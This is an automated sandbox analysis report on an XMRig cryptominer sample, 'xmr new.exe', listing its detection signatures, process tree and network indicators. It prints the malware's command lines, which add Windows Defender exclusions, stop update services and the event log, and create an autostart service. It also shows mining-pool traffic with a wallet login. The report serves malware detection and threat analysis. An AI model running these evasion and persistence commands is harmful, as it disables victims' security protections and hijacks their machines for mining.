Windows Analysis Report
xmr new.exe

Overview

General Information

Sample name:xmr new.exe
Analysis ID:1585416
MD5:7d6398ebfb82a24748617189bf4ad691
SHA1:6c96d0e343e1e84bf58670f1249c1694a2012f04
SHA256:d7cd81563e5b98b9a329286557de71186d3f8f364a46691aca253ca00e4c3ef2
Tags:CoinMiner, exe, user-aachum

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • xmr new.exe (PID: 2416 cmdline: "C:\Users\user\Desktop\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
    • powershell.exe (PID: 6336 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1080 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3492 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5420 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2068 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6512 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1524 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3252 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2284 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3360 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3004 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3240 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 3412 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 4020 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4516 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4844 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eejhedztifcv.exe (PID: 4752 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: 7D6398EBFB82A24748617189BF4AD691)
    • powershell.exe (PID: 5388 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3280 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2016 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6512 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2280 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2572 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2284 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3968 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2688 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4512 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4848 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 4196 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1028 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 4864 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 1532 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
Name:xmrig
Description:According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: dump.pcap, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown, Strings:
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
Source: 66.2.dialer.exe.140000000.0.unpack, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 66.2.dialer.exe.140000000.0.unpack, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown, Strings:
        • 0x37ef98:$a1: mining.set_target
        • 0x371220:$a2: XMRIG_HOSTNAME
        • 0x373b48:$a3: Usage: xmrig [OPTIONS]
        • 0x3711f8:$a4: XMRIG_VERSION
Source: 66.2.dialer.exe.140000000.0.unpack, Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Author: Florian Roth, Strings:
        • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 66.2.dialer.exe.140000000.0.unpack, Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Author: ditekSHen, Strings:
        • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
        • 0x3cd180:$s3: \\.\WinRing0_
        • 0x376148:$s4: pool_wallet
        • 0x3705f0:$s5: cryptonight
        • 0x370600:$s5: cryptonight
        • 0x370610:$s5: cryptonight
        • 0x370620:$s5: cryptonight
        • 0x370638:$s5: cryptonight
        • 0x370648:$s5: cryptonight
        • 0x370658:$s5: cryptonight
        • 0x370670:$s5: cryptonight
        • 0x370680:$s5: cryptonight
        • 0x370698:$s5: cryptonight
        • 0x3706b0:$s5: cryptonight
        • 0x3706c0:$s5: cryptonight
        • 0x3706d0:$s5: cryptonight
        • 0x3706e0:$s5: cryptonight
        • 0x3706f8:$s5: cryptonight
        • 0x370710:$s5: cryptonight
        • 0x370720:$s5: cryptonight
        • 0x370730:$s5: cryptonight

        Change of critical system settings

        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2284, ProcessName: powercfg.exe

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6336, ProcessName: powershell.exe
        Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 80.240.16.67, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\dialer.exe, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49708
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6336, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 3412, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", ProcessId: 4516, ProcessName: sc.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6336, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4944, ProcessName: sc.exe
        Timestamp: 2025-01-07T16:10:22.405902+0100, SID: 2036289, Severity: 2, Classtype: Crypto Currency Mining Activity Detected, Source IP: 192.168.2.9, Source Port: 65188, Destination IP: 1.1.1.1, Destination Port: 53, Protocol: UDP
        Timestamp: 2025-01-07T16:09:59.175553+0100, SID: 2826930, Severity: 2, Classtype: Crypto Currency Mining Activity Detected, Source IP: 192.168.2.9, Source Port: 49708, Destination IP: 80.240.16.67, Destination Port: 8888, Protocol: TCP

        AV Detection

        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe, ReversingLabs: Detection: 73%
        Source: xmr new.exe, ReversingLabs: Detection: 73%
        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

        Bitcoin Miner

        Source: Yara match, File source: dump.pcap, type: PCAP
        Source: Yara match, File source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: global trafficTCP traffic: 192.168.2.9:49708 -> 80.240.16.67:8888 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"41ifakragknzbfdnfjzm9djd14pwku6q6adt7y7qtnq4avfwe1bmj8fhgsqtqkv82rxtobqika7ud71ufhvqkmuttjpziaw","pass":"new","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
        Source: dialer.exe, String found in binary or memory: cryptonight-monerov7
        Source: xmr new.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\winlogon.exe, Code function: 31_2_000001F385BCDCE0 FindFirstFileExW, 31_2_000001F385BCDCE0
        Source: C:\Windows\System32\lsass.exe, Code function: 37_2_000002A29199DCE0 FindFirstFileExW, 37_2_000002A29199DCE0
        Source: C:\Windows\System32\svchost.exe, Code function: 40_2_0000014E25EDDCE0 FindFirstFileExW, 40_2_0000014E25EDDCE0
        Source: C:\Windows\System32\dwm.exe, Code function: 42_2_00000283E0F5DCE0 FindFirstFileExW, 42_2_00000283E0F5DCE0
        Source: C:\Windows\System32\svchost.exe, Code function: 67_2_000001FB539CDCE0 FindFirstFileExW, 67_2_000001FB539CDCE0
        Source: C:\Windows\System32\svchost.exe, Code function: 68_2_000001CBD8BDDCE0 FindFirstFileExW, 68_2_000001CBD8BDDCE0
        Source: C:\Windows\System32\svchost.exe, Code function: 69_2_000001F2BD16DCE0 FindFirstFileExW, 69_2_000001F2BD16DCE0
        Source: global traffic, TCP traffic: 192.168.2.9:49708 -> 80.240.16.67:8888
        Source: Network traffic, Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:65188 -> 1.1.1.1:53
        Source: Network traffic, Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.9:49708 -> 80.240.16.67:8888
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, DNS traffic detected: DNS query: pool.hashvault.pro
        Source: global traffic, DNS traffic detected: DNS query: miners20002.com
        Source: lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalR
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799573161.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: lsass.exe, 00000025.00000002.2799238553.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
